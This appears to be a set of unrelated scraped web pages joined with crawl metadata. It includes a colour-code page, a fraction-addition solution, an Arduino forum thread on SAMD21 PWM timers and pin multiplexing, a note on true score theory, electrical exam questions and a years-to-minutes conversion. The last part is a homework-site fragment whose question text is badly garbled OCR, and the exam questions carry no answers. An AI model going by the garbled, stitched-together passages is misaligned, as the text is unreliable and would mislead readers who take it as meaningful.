#7ba7ae\n``#7ba7ae` `rgb(123,167,174)``\n``#73adb6` `rgb(115,173,182)``\n• #6bb3be\n``#6bb3be` `rgb(107,179,190)``\n• #63b9c6\n``#63b9c6` `rgb(99,185,198)``\n• #5bbfce\n``#5bbfce` `rgb(91,191,206)``\n• #52c5d7\n``#52c5d7` `rgb(82,197,215)``\n• #4acbdf\n``#4acbdf` `rgb(74,203,223)``\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n``#3ad7ef` `rgb(58,215,239)``\n• #32ddf7\n``#32ddf7` `rgb(50,221,247)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #42d1e7 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5318549,"math_prob":0.6194067,"size":3701,"snap":"2020-10-2020-16","text_gpt3_token_len":1693,"char_repetition_ratio":0.12226129,"word_repetition_ratio":0.011111111,"special_character_ratio":0.54525805,"punctuation_ratio":0.23397075,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9874194,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-10T03:54:39Z\",\"WARC-Record-ID\":\"<urn:uuid:036ba78b-7133-4dd7-9501-a0c3b44debfb>\",\"Content-Length\":\"36305\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:30715e1f-2628-4d90-b4f1-3e694a6597e1>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e736f82-b475-49a0-96bd-cd80dd9f4ffe>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/42d1e7\",\"WARC-Payload-Digest\":\"sha1:BMQZYS43YNTQFJQ52SBINLO3VP3DVQJ2\",\"WARC-Block-Digest\":\"sha1:F2D64N352VJEKCILVIW24ZEAL4TN6MAC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371883359.91_warc_CC-MAIN-20200410012405-20200410042905-00551.warc.gz\"}"}
https://answers.everydaycalculation.com/add-fractions/2-28-plus-1-7
[ "Solutions by everydaycalculation.com\n\nAdd 2/28 and 1/7\n\n2/28 + 1/7 is 3/14.\n\nSteps for adding fractions\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 28 and 7 is 28\n2. For the 1st fraction, since 28 × 1 = 28,\n2/28 = 2 × 1/28 × 1 = 2/28\n3. Likewise, for the 2nd fraction, since 7 × 4 = 28,\n1/7 = 1 × 4/7 × 4 = 4/28\n4. Add the two fractions:\n2/28 + 4/28 = 2 + 4/28 = 6/28\n5. After reducing the fraction, the answer is 3/14" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.65735394,"math_prob":0.9996586,"size":310,"snap":"2019-43-2019-47","text_gpt3_token_len":147,"char_repetition_ratio":0.26143792,"word_repetition_ratio":0.0,"special_character_ratio":0.5322581,"punctuation_ratio":0.07058824,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997218,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-14T20:35:34Z\",\"WARC-Record-ID\":\"<urn:uuid:df67eb6a-204b-4d95-bf24-339294e0bca9>\",\"Content-Length\":\"8212\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:50334e54-0eba-4b87-8bc8-21d0ca1b97b2>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d5ef3fa-59ce-423c-80b4-ca746e2d4d36>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/add-fractions/2-28-plus-1-7\",\"WARC-Payload-Digest\":\"sha1:6WYVMZPDP4XVAMDJFP5P6HAE2TMZETMN\",\"WARC-Block-Digest\":\"sha1:T3I4QB47EZL35L5O6MYL7AXS4CWH4IUW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986655310.17_warc_CC-MAIN-20191014200522-20191014224022-00349.warc.gz\"}"}
https://forum.arduino.cc/t/please-help-understand-pwm-on-samd21/373173
[ "I am using PWM in AVR and its fairly easy to understand but I can't seem to find any material or articles other than datasheet explaining how PWM works on SAMD21.\n\n1- the information about SAMD21JXX saying it has 24 PWM channels since each of the three 8 bit timers bit can be used for PWM. , how is it done? and how each bit is mapped to a physical pin ?\n\n2- I need 8 PWM signals , which physical pins I can use without sacrificing the UART pins?\n\n3- in AVR I am using the dual slope PWM but the graphs for it looks very different from the dual slope PWM graphs shown for SAMD21 ?\n\n4- is there any example of a dual slope PWM in ASF available or C available ?\n\nthanks\n\nDual slope PWM on the SAMD21 is covered in the thread \"Changing Arduino Zero PWM Frequency\": Changing Arduino Zero PWM Frequency - Arduino Zero - Arduino Forum\n\nThe TCC timers provide up to 8 PWM outputs. Additional PWM outputs can be provided by the TC timers, although these provide a less fully featured PWM operation.\n\nhi Martin!\n\nI am very new to SAMD21 so bare with my stupid questions. I am using SAMW25 which has a built in SAMD21 , which 8 pins on this module I can use as PWM pins still leaving one UART port available (if these are multiplexed ).\n\non AVR there are 8 timer registers that I can easily control by storing some value e.g in a 8 bit register I store 255/2 approx. 127 to get 50% duty cycle or I store 255 to get 100% duty cycle etc.\n\nI need to do the same in SAMD21 .\n\nthanks\n\nI am using SAMW25 which has a built in SAMD21 ,...\n\nHave you burnt the Arduino.cc bootloader and are you using Arduino code with this board?\n\n...which 8 pins on this module I can use as PWM pins still leaving one UART port available (if these are multiplexed ).\n\nIn the \"Changing Arduino Zero PWM Frequency\" thread, I allocated timer TCC0 to pins: D2 (PA14), D5 (PA15), D6 (PA20) and D7 (PA21). It's also possible to use timer TCC1 on pins: D4 (PA8) and D3 (PA9), as well as timer TCC2 on pins: D11 (PA16) and D13 (PA17).\n\nThis leaves the Serial1 port on pins D0 (PA11) and D1 (PA10) free.\n\nI have not started to use anything yet as I am struggling to understand how the PWM works on SAMD21.\nso if I use TCC0 timer on PA14 ,PA15,PA20, PA21 which four registers I can use to control the PWM on these pins ? like in AVR for timer TCCR0 there are two registers OCR0A and OCR0B that I can use to control the PWM .\n\nIf you look at the code at the beginning 2nd page of the thread, “Changing Arduino Zero PWM Frequency”: https://forum.arduino.cc/index.php?topic=346731.15, it gives a comparison of dual slope PWM between the AVR and SAMD21.\n\nhi Martin\nI looked at the code , its fixing the duty cycle at 50% and changing the frequency , my needs are opposite, I need a fixed frequency between 100Hz-1KHz and have a control over the duty cycle by depositing an integer value in the REG_TCC0_CCBx registers.\ncan you give me an example for one pin and I can try to expand it to use 8 ?\n\nthanks\n\n\"To change the PWM pulse width (phase), just load the timer's CCBx register with a value between 0 and 96. 0 outputs 0V (0% duty cycle), 96 outputs 3.3V (100% duty cycle). Loading the CCBx register with 48 gives a 50% duty cycle.\n\"\n\nI read analog values in 10bit resolution giving me a values ranging from 0-1023 which I currently deposit in the OCR register.\nhow can I modify your example to use this range instead of 0-96 ? as this does not give me a very good resolution.\n\nregards\n\nhi Martin\nsorry to bombard you with questions , can you please take a look at the SAMW25 module which uses SAMD21 processor and tell me if I can get the following number of pins out of it ?\n\n[\n\n8 PWM signals.\n1 UART\n1 I2C channel\n1 SPI channel\n4 GPIO\n\nI looked at the code , its fixing the duty cycle at 50% and changing the frequency , my needs are opposite, I need a fixed frequency between 100Hz-1KHz and have a control over the duty cycle by depositing an integer value in the REG_TCC0_CCBx registers.\ncan you give me an example for one pin and I can try to expand it to use 8 ?\n\nAs I said, if you look at the code at the beginning 2nd page of the thread, \"Changing Arduino Zero PWM Frequency\": Changing Arduino Zero PWM Frequency - Arduino Zero - Arduino Forum, it provides an example of using dual slope PWM at 50Hz on four outputs. To change the duty cycle load the REG_TCC0_CCBx register with a value between 0 and whatever is in the PER (period) register, (in this case 20000).\n\nhow can I modify your example to use this range instead of 0-96 ? as this does not give me a very good resolution.\n\nThe 50Hz example gives a resolution of 14-bits.\n\ncan you please take a look at the SAMW25 module which uses SAMD21 processor and tell me if I can get the following number of pins out of it ?\n\nI’m not familiar with the SAMW25, but the Arduino Zero (that also uses the SAMD21G) would be able to meet these IO requirements.\n\nMartinL:\nAs I said, if you look at the code at the beginning 2nd page of the thread, \"Changing Arduino Zero PWM Frequency\": Changing Arduino Zero PWM Frequency - Arduino Zero - Arduino Forum, it provides an example of using dual slope PWM at 50Hz on four outputs. To change the duty cycle load the REG_TCC0_CCBx register with a value between 0 and whatever is in the PER (period) register, (in this case 20000).\n\nThe 50Hz example gives a resolution of 14-bits.\n\nhi Martin\n\njust interpreting the PWM from datasheet requires a Phd so my hats off for you to know it so very well.\nand thanks for taking your time to share your knowledge on the forum.\n\nI currently use 10 bit resolution. How can I modify your code to use 10bit resolution ? and what would be the range of deposited values in REG_TCC0_CCBx register?\n\nHi aliyesami,\n\nI currently use 10 bit resolution. How can I modify your code to use 10bit resolution ? and what would be the range of deposited values in REG_TCC0_CCBx register?\n\nUsing a base timer frequency of 2MHz (48MHz/3/8) you can adjust the frequency and resolution by chaning the value of the PER (period), for example:\n\n20000 = 50Hz output with 14-bit resolution\n2500 = 400Hz output with 11-bit resolution\n\nThe value in the REG_TCC0_CCBx is any number between 0 and the value in the PER register. So for 400Hz:\n\n0 = 0% duty cycle\n1250 = 50% duty cycle\n2500 = 100% duty cycle\n\nhi Martin !\n\nI tried to calculate these values to see if i am understanding you properly .There are 3 forumlas given in the SAMD21 datasheet on page 661-662 .\nI started by calculating the value of PER for 10bit resolution and then used that value to calculate the frequency which for me can be any value between 100-1Khz.\nbut after that i am confused . The datasheet gives the formula for pulse width which i assume is the duty cycle?\nso what would be the units in ? for 100% duty cycle what value i would use in the last formula for Pulsewidth to get the value for CCx ?\nare my first two steps correct ?\n\n``````clock frequency = 48Mhz\nN =prescalar = 64\n\nRpwm_ds = log(PER+1)/log(2)\nPER = 2expRpwd_ds -1 =  2exp10 - 1 = 1023\n\nfpwm_ds =  fGlck_tcc/(2xNxPER)  = 48000000hz /2x64x1023 = 366.5Hz\n\nPulseWidth= 2N(PER-CCx)/fGclck_tcc\nPulseWidthXfGclck_tcc =  2N.PER - 2N.CCx\n2N.CCx = 2N.PER - (PulseWidth X fGclck_tcc)\nCCx =    (2N.PER - (PulseWidth X fGclck_tcc))/2N\n``````\n\nHi aliyesami,\n\nare my first two steps correct ?\n\nYour calculations are completely correct, only that in my example I reversed the polarity of the waveform, so that when CCBx is 0, it outputs 0V at 0% duty cycle and when CCBx is equal to PER, it outputs a constant 3.3V at 100%.\n\nIf you reverse the polarity, this gives:\n\npulse width = (2 * N * CCx) / fgclk_tcc for CCx <= PER\n\nWhere “pulse width” is the width of the (logic high) pulse in seconds.\n\nNote that I’ve used the buffered CCBx registers rather than the CCx. The buffered registers allow changes to be made to the duty cycle without causing gliches on your waveform.\n\nMartinL:\nHi aliyesami,\n\nYour calculations are completely correct, only that in my example I reversed the polarity of the waveform, so that when CCBx is 0, it outputs 0V at 0% duty cycle and when CCBx is equal to PER, it outputs a constant 3.3V at 100%.\n\nIf you reverse the polarity, this gives:\n\npulse width = (2 * N * CCx) / fgclk_tcc for CCx <= PER\n\nWhere “pulse width” is the width of the (logic high) pulse in seconds.\n\nNote that I’ve used the buffered CCBx registers rather than the CCx. The buffered registers allow changes to be made to the duty cycle without causing gliches on your waveform.\n\nHi Martin !\nso for my case the Pulse width with be either\n2x64x0/48000000=0 or\n2x64x1023/48000000 = 2.728ms ?\n\nI am confused about polarity since I will also be getting 0s for CCx=0 or not?\n\nHi aliyesami,\n\nso for my case the Pulse width with be either\n2x64x0/48000000=0 or\n2x64x1023/48000000 = 2.728ms ?\n\nI will also be getting 0s for CCx=0 or not?\n\nYes that's right. At CCx = 0, you'll get a constant 0V output. At CCx = 1023, you'll get a constant 3.3V output.\n\nNotice at Cx = 1023, 1 / 2.728ms = 366.5Hz. In this instance your pulse is taking up the full 2.728ms period, so the output becomes a constant 3.3V.\n\nthanks Martin I learned a lot from you .\nnow that I know how the PWM wave calculations are done, can you also help me understand this port multiplexing ?\nhow does the following command work ? I am not able to tie it to the datasheet, i mean why are we doing what we are doing in these commands.\n\n``````// Enable the port multiplexer for the digital pin D7\nPORT->Group[g_APinDescription.ulPort].PINCFG[g_APinDescription.ulPin].bit.PMUXEN = 1;\n\n// Connect the TCC0 timer to digital output D7 - port pins are paired odd PMUO and even PMUXE\n// F & E specify the timers: TCC0, TCC1 and TCC2\nPORT->Group[g_APinDescription.ulPort].PMUX[g_APinDescription.ulPin >> 1].reg = PORT_PMUX_PMUXO_F;\n``````\n\nThe pins on the SAMD21 can perform as GPIO or number of different peripheral functions: timer, analog input, serial communications, etc.. , but by default they're GPIO.\n\nEach pin has its own \"Pin Configuration\" register, that amongst other things can activate the input buffer or set the pull-up resistor. One of the bits however is the PMUXEN (Peripheral Multiplexer Enable) bit. Setting this bit switches the pin from GPIO to one of a number of (yet to be defined) peripherals.\n\nThe following line sets the PMUXEN in the Pin Configuration register for digital pin D7:\n\n``````// Enable the port multiplexer for the digital pin D7\nPORT->Group[g_APinDescription.ulPort].PINCFG[g_APinDescription.ulPin].bit.PMUXEN = 1;\n``````\n\nAs D7 is actually port pin PA21 on the SAMD21, so you could also write:\n\n``````// Enable the port multiplexer for the port pin PA21:\nPORT->Group[PORTA].PINCFG.bit.PMUXEN = 1;\n``````\n\nThe next step is to select the peripheral for the given pin, using the \"Peripheral Multiplexing\" registers. Each peripheral is given a letter from A-H. The TCC timers are listed as peripheral F. While there's one \"Pin Configuration\" register per pin, there's only one \"Peripheral Multiplexing\" registers for each odd and even pin pair. (So there are only half the number of \"Periphal Multiplexing\" registers). For example port pin PA21 (D7) is odd, this is paired with PA20 (D6), which is even.\n\nEach \"Peripheral Multiplexing\" 8-bit register is split into two 4-bit halves, odd and even, with each half specifying the selected peripheral A-H. PORT_PMUX_PMUXO_F is used to set the odd port for peripheral F and PORT_PMUX_PMUXE_F to set the even port. To select a given PMUX register you specify the even pair divided by 2 (>> 1), as there are only half the number of \"Peripheral Multiplexing\" registers.\n\n``````// Connect the TCC0 timer to digital output D7 - port pins are paired odd PMUO and even PMUXE\n// F & E specify the timers: TCC0, TCC1 and TCC2\nPORT->Group[g_APinDescription.ulPort].PMUX[g_APinDescription.ulPin >> 1].reg = PORT_PMUX_PMUXO_F;\n``````\n\nThis could also be written as:\n\n``````// Connect the TCC0 timer to port pin PA21 - port pins are paired odd PMUO and even PMUXE\n// F & E specify the timers: TCC0, TCC1 and TCC2\nPORT->Group[PORTA].PMUX[20 >> 1].reg = PORT_PMUX_PMUXO_F;\n``````\n\nIt took me a while to bend my head around port multiplexing.\n\nthanks Martin ,\nfirst part is clear now on how and why the Pin configuration register has to be set . I have questions about the second part.\n\nMartinL:\nThe next step is to select the peripheral for the given pin, using the \"Peripheral Multiplexing\" registers. Each peripheral is given a letter from A-H. The TCC timers are listed as peripheral F. While there's one \"Pin Configuration\" register per pin, there's only one \"Peripheral Multiplexing\" registers for each odd and even pin pair. (So there are only half the number of \"Periphal Multiplexing\" registers). For example port pin PA21 (D7) is odd, this is paired with PA20 (D6), which is even.\n\nodd and even pair of what ?\nwhy PA21 is paired with PA20 and not PA18 ? That would still make it even odd.\nIam also seeing TCC timers in E , how come?\n\nEach \"Peripheral Multiplexing\" 8-bit register is split into two 4-bit halves, odd and even, with each half specifying the selected peripheral A-G. PORT_PMUX_PMUXO_F is used to set the odd port for peripheral F and PORT_PMUX_PMUXE_F to set the even port. To select a given PMUX register you specify the even pair divided by 2 (>> 1), as there are only half the number of \"Peripheral Multiplexing\" registers.\n\nwhy selected peripherial A-G ? and not A- H ?\nI am not understanding this even or odd port . can you please explain ?\nhow dividing by 2 selects the given PMUX register can you give an example ?\n\n1 Like" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84978646,"math_prob":0.8397369,"size":2323,"snap":"2022-05-2022-21","text_gpt3_token_len":623,"char_repetition_ratio":0.1375593,"word_repetition_ratio":0.13550135,"special_character_ratio":0.24967714,"punctuation_ratio":0.12556054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9708397,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-26T04:56:02Z\",\"WARC-Record-ID\":\"<urn:uuid:439a9d6c-3b05-461f-80f9-202b34fbafbc>\",\"Content-Length\":\"74175\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b19edc82-d069-41c6-9d04-1d1c12322753>\",\"WARC-Concurrent-To\":\"<urn:uuid:8c4e013b-f08d-4391-9dfe-cf6b00475d31>\",\"WARC-IP-Address\":\"184.104.202.139\",\"WARC-Target-URI\":\"https://forum.arduino.cc/t/please-help-understand-pwm-on-samd21/373173\",\"WARC-Payload-Digest\":\"sha1:2SD6TPE656VIZ3O6XCKUJ5XPSWC45P3H\",\"WARC-Block-Digest\":\"sha1:2SJTJQK6PNVGRYIT2FXVE65CO5IVGRSB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662601401.72_warc_CC-MAIN-20220526035036-20220526065036-00321.warc.gz\"}"}
http://www.socialresearchmethods.net/kb/truescor.php
[ "HomeNext »", null, "True Score Theory is a theory about measurement. Like all theories, you need to recognize that it is not proven -- it is postulated as a model of how the world operates. Like many very powerful model, the true score theory is a very simple one. Essentially, true score theory maintains that every measurement is an additive composite of two components: true ability (or the true level) of the respondent on that measure; and random error. We observe the measurement -- the score on the test, the total for a self-esteem instrument, the scale value for a person's weight. We don't observe what's on the right side of the equation (only God knows what those values are!), we assume that there are two components to the right side.\n\nThe simple equation of X = T + eX has a parallel equation at the level of the variance or variability of a measure. That is, across a set of scores, we assume that:\n\nvar(X) = var(T) + var(eX)\n\nIn more human terms this means that the variability of your measure is the sum of the variability due to true score and the variability due to random error. This will have important implications when we consider some of the more advanced models for adjusting for errors in measurement.\n\nWhy is true score theory important? For one thing, it is a simple yet powerful model for measurement. It reminds us that most measurement has an error component. Second, true score theory is the foundation of reliability theory. A measure that has no random error (i.e., is all true score) is perfectly reliable; a measure that has no true score (i.e., is all random error) has zero reliability. Third, true score theory can be used in computer simulations as the basis for generating \"observed\" scores with certain known properties.\n\nYou should know that the true score model is not the only measurement model available. measurement theorists continue to come up with more and more complex models that they think represent reality even better. But these models are complicated enough that they lie outside the boundaries of this document. In any event, true score theory should give you an idea of why measurement models are important at all and how they can be used as the basis for defining key research ideas.\n\nHomeNext »" ]
[ null, "http://www.socialresearchmethods.net/kb/Assets/images/truescor.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9346884,"math_prob":0.9876326,"size":2418,"snap":"2019-35-2019-39","text_gpt3_token_len":500,"char_repetition_ratio":0.16694283,"word_repetition_ratio":0.0,"special_character_ratio":0.21050455,"punctuation_ratio":0.1012931,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9852177,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-23T00:24:58Z\",\"WARC-Record-ID\":\"<urn:uuid:ac6ad3e1-9a03-43fb-b320-f3f10a3e72f3>\",\"Content-Length\":\"24511\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6a9269f6-e371-4c65-8967-2a3efa3f43c1>\",\"WARC-Concurrent-To\":\"<urn:uuid:2f282e6e-88e5-49de-b39b-bc397906a8f1>\",\"WARC-IP-Address\":\"54.156.23.98\",\"WARC-Target-URI\":\"http://www.socialresearchmethods.net/kb/truescor.php\",\"WARC-Payload-Digest\":\"sha1:NHIJHMAVUOKVIC27PGWNBE3FN3THJLDE\",\"WARC-Block-Digest\":\"sha1:OWZXIIBU5ISS3OPJ3ZQ6XKNVKFVDAPJZ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514575844.94_warc_CC-MAIN-20190923002147-20190923024147-00485.warc.gz\"}"}
https://www.electricalexams.co/rrb-je-electrical-practice-paper/
[ "# RRB JE electrical practice paper | RRB JE Electrical\n\nQues.1. The single phase Induction Motor(Capacitor Start-Capacitor Run) basically is\n\n1. Single phase motor\n2. Two-phase motor\n3. A.C series Motor\n4. None of  these\n\nQues.2. The equalizer rings are used in\n\n1. Lap winding\n2. Wave winding\n3. Multilayer wave winding\n4. None of these\n\nQues.3. The horsepower obtained from the shaft torque is called\n\n1. Indicated horsepower of I.H.P\n2. Brake Horsepower of B.H.P\n3. F.H.P\n4. None of the above\n\nQues.4. When the torque of the D.C motor is double the power is increased by\n\n1. 70%\n2. 50 to 60%\n3. 20%\n4. 100%\n\nQues.5. The speed of sound in ideal gas varies directly at its\n\n1. Pressure\n2. Temperature\n3. Density\n4. Absoulte Temperature\n\nQues.6. A pump driven by D.C Motor lifts 2,50,000 kgm of water per hour to a height of 50 metre. The efficiency of the pump is 80% and that of motor is 90%. If the supply voltage is 500 Volts, find the current drawn by the motor\n\n1. 94.62 A\n2. 26.45 A\n3. 78.34 A\n4. 89.90 A\n\nQues.7. What is the mass of electron?\n\n1. 1/1840 that of proton\n2. 1/3650 that of proton\n3. 1/1840 that of neutron\n4. 1/3650 that of neutron\n\nQues.8. What is the type of high voltage, high current discharge capacitor?\n\n1. Rheostat\n2. Trimmer\n3. Paper capacitor\n4. None of the above\n\nQues.9. Two equally charged spheres placed in the air repel each other with a force equal to weight of 10−1 kg. If there centres are 20 cm apart. Find the charge on each sphere\n\n1. 4.39 × 10−6 C\n2. 3.920  × 10−6 C\n3. 2.89  × 10−6 C\n4. 2.09 × 10−6 C" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.801077,"math_prob":0.9734991,"size":1569,"snap":"2022-05-2022-21","text_gpt3_token_len":520,"char_repetition_ratio":0.1201278,"word_repetition_ratio":0.0065146578,"special_character_ratio":0.34034416,"punctuation_ratio":0.13239437,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9699338,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-22T00:55:11Z\",\"WARC-Record-ID\":\"<urn:uuid:e59702ec-43a7-4710-a8e2-48af54466dd2>\",\"Content-Length\":\"216000\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8aa16f69-7cb5-477e-a912-10050e12d3cd>\",\"WARC-Concurrent-To\":\"<urn:uuid:3582f416-0910-4198-b0d9-d6ec57a77458>\",\"WARC-IP-Address\":\"104.21.80.72\",\"WARC-Target-URI\":\"https://www.electricalexams.co/rrb-je-electrical-practice-paper/\",\"WARC-Payload-Digest\":\"sha1:MQK5YXEPNDSYFAUDSZAROJNNQ767XHZ2\",\"WARC-Block-Digest\":\"sha1:WRZWEWK6TEN77IIEPAEWWWGMFMWC3UAT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662543264.49_warc_CC-MAIN-20220522001016-20220522031016-00541.warc.gz\"}"}
https://convertoctopus.com/2-1-years-to-minutes
[ "## Conversion formula\n\nThe conversion factor from years to minutes is 525600, which means that 1 year is equal to 525600 minutes:\n\n1 yr = 525600 min\n\nTo convert 2.1 years into minutes we have to multiply 2.1 by the conversion factor in order to get the time amount from years to minutes. We can also form a simple proportion to calculate the result:\n\n1 yr → 525600 min\n\n2.1 yr → T(min)\n\nSolve the above proportion to obtain the time T in minutes:\n\nT(min) = 2.1 yr × 525600 min\n\nT(min) = 1103760 min\n\nThe final result is:\n\n2.1 yr → 1103760 min\n\nWe conclude that 2.1 years is equivalent to 1103760 minutes:\n\n2.1 years = 1103760 minutes\n\n## Alternative conversion\n\nWe can also convert by utilizing the inverse value of the conversion factor. In this case 1 minute is equal to 9.0599405667899E-7 × 2.1 years.\n\nAnother way is saying that 2.1 years is equal to 1 ÷ 9.0599405667899E-7 minutes.\n\n## Approximate result\n\nFor practical purposes we can round our final result to an approximate numerical value. We can say that two point one years is approximately one million one hundred three thousand seven hundred sixty minutes:\n\n2.1 yr ≅ 1103760 min\n\nAn alternative is also that one minute is approximately zero times two point one years.\n\n## Conversion table\n\n### years to minutes chart\n\nFor quick reference purposes, below is the conversion table you can use to convert from years to minutes\n\nyears (yr) minutes (min)\n3.1 years 1629360 minutes\n4.1 years 2154960 minutes\n5.1 years 2680560 minutes\n6.1 years 3206160 minutes\n7.1 years 3731760 minutes\n8.1 years 4257360 minutes\n9.1 years 4782960 minutes\n10.1 years 5308560 minutes\n11.1 years 5834160 minutes\n12.1 years 6359760 minutes" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.815004,"math_prob":0.9551323,"size":1672,"snap":"2022-05-2022-21","text_gpt3_token_len":482,"char_repetition_ratio":0.22062351,"word_repetition_ratio":0.0,"special_character_ratio":0.3450957,"punctuation_ratio":0.10682493,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9826188,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-27T14:51:43Z\",\"WARC-Record-ID\":\"<urn:uuid:e842f50f-8227-44a5-8e89-4ead718fc812>\",\"Content-Length\":\"30229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d42ece3d-5a4b-4e05-93a8-f6dcf4bb253d>\",\"WARC-Concurrent-To\":\"<urn:uuid:b2aacb43-c388-4a11-819e-38a93879f349>\",\"WARC-IP-Address\":\"104.21.29.10\",\"WARC-Target-URI\":\"https://convertoctopus.com/2-1-years-to-minutes\",\"WARC-Payload-Digest\":\"sha1:U66VWH22COO4UO7DUAH7JGOXECFTTDAR\",\"WARC-Block-Digest\":\"sha1:LBXXXBL4GA5IQLT7DYIGF5VVLULBKGXE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662658761.95_warc_CC-MAIN-20220527142854-20220527172854-00091.warc.gz\"}"}
https://solvedlib.com/n/aton-thtoda-9-ji-i-idala-belo-quot-i-hiceralil-1-88-0-1,20810278
[ "# Aton Thtoda 9 ? ? ji I Idala belo\" =i Hiceralil 1 88 0 1 JH p 1 1 1\n\n###### Question:\n\naton Thtoda 9 ? ? ji I Idala belo\" =i Hiceralil 1 88 0 1 JH p 1 1 1 Teqeruinn 85 0 1 Eua4l 1 1 82 0 L 1 2 ! F line freating Ihe 0l dw; 76 5 Cut-mt is predictad [0 D9 3 numoc olabsonces 62 5 1 L 8 99 lnal grade, 3 6 09 extanalony L tor & sumple ol college sludents nulquot 1 unnvetsdy Corplele parts trough", null, "", null, "#### Similar Solved Questions\n\n##### 3 Be sure to answer all parts. Give the IUPAC name for the following compound points...\n3 Be sure to answer all parts. Give the IUPAC name for the following compound points OH eBook O2N NO2 Print References (select) nitrobenzenamine hydroxynitrobenzene dinitrophenol dinitrobenzenol 10...\n##### Question 22 of 33 What is the equilibrium constant K at 25°C for an electrochemical cell...\nQuestion 22 of 33 What is the equilibrium constant K at 25°C for an electrochemical cell when E° = +0.0490 V and n = 2? (F = 96,500 J/(V.mol), R = 8.314 J/(mol·K))...\n##### 6 15 Please refer to your textbook for this question. The term deflation is used to...\n6 15 Please refer to your textbook for this question. The term deflation is used to describe a situation in which stock-market prices are decreasing. o the overall level of prices in the economy is decreasing. incomes in the economy are decreasing. the GDP deflator is involved....\n##### Question 20 of 302 Points(Vx Pixbb (V ) Universal quantification represented by an upside ( downA What doesmean?Select the correct responseNone Of theseBoth A and [There ExistFor AlI\nQuestion 20 of 30 2 Points (Vx Pixbb (V ) Universal quantification represented by an upside ( downA What does mean? Select the correct response None Of these Both A and [ There Exist For AlI...\n##### Wh te exprrIcd Fmulaneacuoa benueraALO AiO AloWhich ofthc = folleaing clencnls can Ion MelaetnWhich ofthc following Ixan ionic compound? CO.Co C,:What i> the chareton uth Prxonez INEET7HaETO7t7Which atom cxists cabon bjomin wlfvr phosphorousdiatomic molecule naunrc7Which of thc following molecules has tripke bond? CO: NH;What is the solvent in = solution of sodium chlonde? sodium chloride sodium oxygcT alcr\nWh te exprrIcd Fmula neacuoa benuera ALO AiO Alo Which ofthc = folleaing clencnls can Ion Melaetn Which ofthc following Ixan ionic compound? CO. Co C,: What i> the chare ton uth Prxonez INEET7 HaETO7t7 Which atom cxists cabon bjomin wlfvr phosphorous diatomic molecule naunrc7 Which of thc fol...\n##### HEMI07_OIV In organic chemistry; what should your first \"move\" be after studying phosphine PH;? Select one: a. Substitute a nitrogen for the phosphorous b Create a ring of phosphorus atoms Create a three membered ring; with two carbons and one phosphorous Put an oxygen in place of one of the hydrogen atoms Replace one of the 